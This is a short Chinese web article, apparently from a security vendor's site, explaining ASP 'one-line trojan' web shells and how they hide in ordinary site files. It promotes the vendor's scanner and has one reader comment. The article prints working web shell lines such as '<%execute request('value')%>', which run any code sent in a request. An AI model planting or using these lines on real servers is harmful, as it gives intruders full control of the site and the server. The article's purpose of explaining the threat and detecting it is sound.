关于一句话木马

2010-12-4 16:37:32 来源:本站原创,请勿转载 浏览:424
关于一句话木马

    一句话木马是很简短的木马,核心代码就只有一句,但其破坏力非常大。如:

    Execute Session('cmd')

    Execute Request('cmd')

    Eval Session('cmd')

    Eval Request('cmd')

    …………等。

 

<%execute request('value')%>

<%eval request('value')%>

    原理:通过execute或eval函数,将传递进去的内容作为脚本运行。一般一句话木马都带有一个客户端接口,留下这个接口的非法用户,只要找到这个接口,通过发送不同的命令,就能执行不同的功能,比如删除文件,挂马等为所欲为的操作,这样就对网站以及服务器产生了不可预知的破坏。

    光一句话木马核心代码本身没有任何破坏力,主要在于传递给这句话的参数内容。

 

    目前,部分用户的网站可能不是自己开发的,而是从网上下载下来修改下前台界面就放到了网络服务器上。却不知这些程序中早已被人留下了后门,其中后门之一就是一句话木马。

 

    基于一句话木马的特征,可以是单个文件,可以是影藏在正常的文件中,插入这一句话即可。比如一般的Md5函数文件,让用户防不胜防。

 

    就目前而言,几乎所有的杀毒软件都无法查杀一句话木马。为了解决一句话木马查杀难题,护卫神对算法进行了多次调整,最终能彻底准确查杀一句话木马,让一句话木马不再有藏身之地。

 

    因此,如果您发现您的某个“正常”文件被护卫神查杀隔离了,请检查该文件,是否含有上述的一句话木马特征,如果有,则清除之,恢复即可。这样,就保证了您网站的安全,也保证了服务器的安全,让您不再担心被破坏的危险。

 

(0)
(0)
分享到:
用户点评 (共有1条评论)
请注意文明用语。
广东网友(IP:61.143.*.*) 2014-11-18 21:40:35
一句话木马防不慎防,有些还在图片中。
可以用护卫神云查杀系统扫描。